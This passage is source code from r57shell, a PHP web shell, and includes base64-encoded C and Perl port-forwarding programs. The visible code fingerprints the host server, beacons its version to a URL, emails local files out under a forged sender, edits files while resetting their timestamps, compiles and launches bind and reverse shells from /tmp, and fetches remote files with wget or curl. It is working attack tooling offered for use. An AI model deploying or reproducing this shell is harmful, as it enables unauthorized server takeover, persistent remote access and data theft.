9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7D
QogIGlmICghKGggPSBnZXRob3N0YnluYW1l
KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7
DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J
0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU
0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFta
Wx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBz
aXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0
KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3
IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgK
Chjc29jayA9IGFjY2VwdChsc29jaywgJmNh
ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0K
ICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5
vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG
5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQ
U5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0s
IElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICA
gZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydC
k7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBza
Xplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBx
dWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jayw
mZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQ
ogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY
3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8
fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI
7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2
ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ
290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0
MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2s
sMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
lsZSk7DQogIHJldHVybiAwOw0KfQ==";
$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2
NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgP
SB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBp
ZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9
zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaX
N0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRha
C0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRl
ZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2g
sICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU
86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoI
SR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+
eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICg
kY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKC
R0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwK
TsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygk
ZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ
1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdC
A9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJ
HRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmlu
dCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHB
yaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdG
J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSU
iAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwg
JGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI
7fQ0KfX19DQo=";
$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yP
SIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9j
YXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJ
OIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG
9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90b
G9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMp
PT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjM
iPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3
VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6L
y9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwv
YT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA
6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PS
JIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwd
CI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+
PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2N
yZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCn
NjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4
Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+Jykv
Ly0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
ybmV0LS0+";
echo $head;
echo '</head>';
if(empty($_POST['cmd'])) {
$serv = array(127,192,172,10);
$addr=@explode('.', $_SERVER['SERVER_ADDR']);
$current_version = str_replace('.','',$version);
if (!in_array($addr[0], $serv)) {
@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$curren
t_version."\" border=0 height=0 width=0>";
@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."")
;}}
echo '<body bgcolor="#FFFFFF"><table width=100% cellpadding=0 cellspacing=0 bgco
lor=#000000>
<tr><td bgcolor=#3A6EA5 width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
</font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2>';
echo ws(2);
echo "<b>".date ("d-m-Y H:i:s")."</b>";
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$langu
age.'_text46']."\"><b>phpinfo</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$langua
ge.'_text47']."\"><b>php.ini</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.
'_text50']."\"><b>cpu</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.
'_text51']."\"><b>mem</b></a> ".$rb;
if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$l
ang[$language.'_text95']."\"><b>users</b></a> ".$rb; }
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.
'_text48']."\"><b>tmp</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$langua
ge.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
echo ws(2);
echo (($safe_mode)?("safe_mode: <b><font color=white>ON</font></b>"):("safe_mode
: <b><font color=orange>OFF</font></b>"));
echo ws(2);
echo "PHP version: <b>".@phpversion()."</b>";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "cURL: ".(($curl_on)?("<b><font color=white>ON</font></b>"):("<b><font colo
r=orange>OFF</font></b>"));
echo ws(2);
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=white>ON</font></b>"; } else { echo "<font color=orange>OFF</f
ont></b>"; }
echo ws(2);
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=ora
nge>OFF</font></b>";}
echo ws(2);
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange
>OFF</font></b>";}
echo ws(2);
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orang
e>OFF</font></b>";}
echo "<br>".ws(2);
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=white>NONE</font><
/b>";}else{echo "<font color=orange>$df</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_
size($all)."</b>";
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td align=right width=100>';
echo $font;
if(!$windows){
echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'
.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'
;
echo "</td><td>";
echo "<font face=Verdana size=-2 color=orange><b>";
$uname = ex('uname -a');
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_u
name(),0,120)."<br>"));
if(!$safe_mode){
$bsd1 = ex('sysctl -n kern.ostype');
$bsd2 = ex('sysctl -n kern.osrelease');
$lin1 = ex('sysctl -n kernel.ostype');
$lin2 = ex('sysctl -n kernel.osrelease');
}
if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
else { $sysctl = "-"; }
echo ws(3).$sysctl."<br>";
echo ws(3).ex('echo $OSTYPE')."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
$id = ex('id');
echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid="
.@getmyuid()." gid=".@getmygid()."<br>"));
echo ws(3).$dir;
echo ws(3).'( '.perms(@fileperms($dir)).' )';
echo "</b></font>";
}
else
{
echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<
br>pwd :'.ws(1).'</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=orange><b>";
echo ws(3).@substr(@php_uname(),0,120)."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
echo ws(3).@get_current_user()."<br>";
echo ws(3).$dir;
echo "<br></font>";
}
echo "</font>";
echo "</td></tr></table>";
if(empty($c1)||empty($c2)) { die(); }
$f = '<br>';
$f .= base64_decode($c1);
$f .= base64_decode($c2);
if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail")
{
$res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."
\r\n");
mr($language,$res);
$_POST['cmd']="";
}
if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" &
& !empty($_POST['loc_file']))
{
if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST
['cmd']=""; }
else
{
$filename = @basename($_POST['loc_file']);
$filedump = @fread($file,@filesize($_POST['loc_file']));
fclose($file);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
$attach = array(
"name"=>$filename,
"type"=>$mime_type,
"content"=>$filedump
);
if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
$res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
mr($language,$res);
$_POST['cmd']="";
}
}
if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
{
$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs
grep -E \''.$_POST['s_text'].'\'';
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
{
switch($_POST['what'])
{
case 'own':
@chown($_POST['param1'],$_POST['param2']);
break;
case 'grp':
@chgrp($_POST['param1'],$_POST['param2']);
break;
case 'mod':
@chmod($_POST['param1'],intval($_POST['param2'], 8));
break;
}
$_POST['cmd']="";
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
{
switch($_POST['what'])
{
case 'file':
if($_POST['action'] == "create")
{
if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")
) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
else {
fclose($file);
$_POST['e_name'] = $_POST['mk_name'];
$_POST['cmd']="edit_file";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr>
<td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".$lang[$lan
guage.'_text61']."</b></font></div></td></tr></table>";
}
}
else if($_POST['action'] == "delete")
{
if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cells
pacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Ve
rdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></tabl
e>";
$_POST['cmd']="";
}
break;
case 'dir':
if($_POST['action'] == "create"){
if(mkdir($_POST['mk_name']))
{
$_POST['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr
><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".$lang[$la
nguage.'_text62']."</b></font></div></td></tr></table>";
}
else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
}
else if($_POST['action'] == "delete"){
if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspa
cing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verd
ana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>
";
$_POST['cmd']="";
}
break;
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'
]))
{
if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cm
d']=""; }
else {
echo $table_up3;
echo $font;
echo "<form name=save_file method=post>";
echo ws(3)."<b>".$_POST['e_name']."</b>";
echo "<div align=center><textarea name=e_text cols=121 rows=24>";
echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
fclose($file);
echo "</textarea>";
echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
echo "<input type=hidden name=dir value=".$dir.">";
echo "<input type=hidden name=cmd value=save_file>";
echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><inp
ut type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
echo "</div>";
echo "</font>";
echo "</form>";
echo "</td></tr></table>";
exit();
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
{
$mtime = @filemtime($_POST['e_name']);
if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
else {
if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
@fwrite($file,$_POST['e_text']);
@touch($_POST['e_name'],$mtime,$mtime);
$_POST['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgc
olor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".$lang[$language.'
_text45']."</b></font></div></td></tr></table>";
}
}
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
{
cf("/tmp/bd.c",$port_bind_bd_c);
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
@unlink("/tmp/bd.c");
$blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
$_POST['cmd']="ps -aux | grep bd";
}
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")
)
{
cf("/tmp/bdpl",$port_bind_bd_pl);
$p2=which("perl");
if(empty($p2)) $p2="perl";
$blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
$_POST['cmd']="ps -aux | grep bdpl";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
{
cf("/tmp/back",$back_connect);
$p2=which("perl");
if(empty($p2)) $p2="perl";
$blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST[
'port']." ...\"";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
{
cf("/tmp/back.c",$back_connect_c);
$blah = ex("gcc -o /tmp/backc /tmp/back.c");
@unlink("/tmp/back.c");
$blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST[
'port']." ...\"";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_PO
ST['remote_port']) && ($_POST['use']=="Perl"))
{
cf("/tmp/dp",$datapipe_pl);
$p2=which("perl");
if(empty($p2)) $p2="perl";
$blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$
_POST['remote_port']." &");
$_POST['cmd']="ps -aux | grep dp";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_PO
ST['remote_port']) && ($_POST['use']=="C"))
{
cf("/tmp/dpc.c",$datapipe_c);
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
@unlink("/tmp/dpc.c");
$blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POS
T['remote_host']." &");
$_POST['cmd']="ps -aux | grep dpc";
}
if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if
($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
if (!empty($HTTP_POST_FILES['userfile']['name']))
{
if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name
']; }
else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
@copy($HTTP_POST_FILES['userfile']['tmp_name'],
$_POST['dir']."/".$nfn)
or print("<font color=orange face=Fixedsys><div align=center>Error uploadi
ng file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
}
if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_f
ile']))
{
switch($_POST['with'])
{
case wget:
$_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].
"";
break;
case fetch:
$_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_fil
e']."";
break;
case lynx:
$_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_
file']."";
break;
case links:
$_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc
_file']."";
break;
case GET:
$_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""
;
break;
case curl:
$_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].
"";
break;
}
}
if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp
_file_down"))
{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { fe($language,0); }
else
{
if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($
language,1); }
else
{
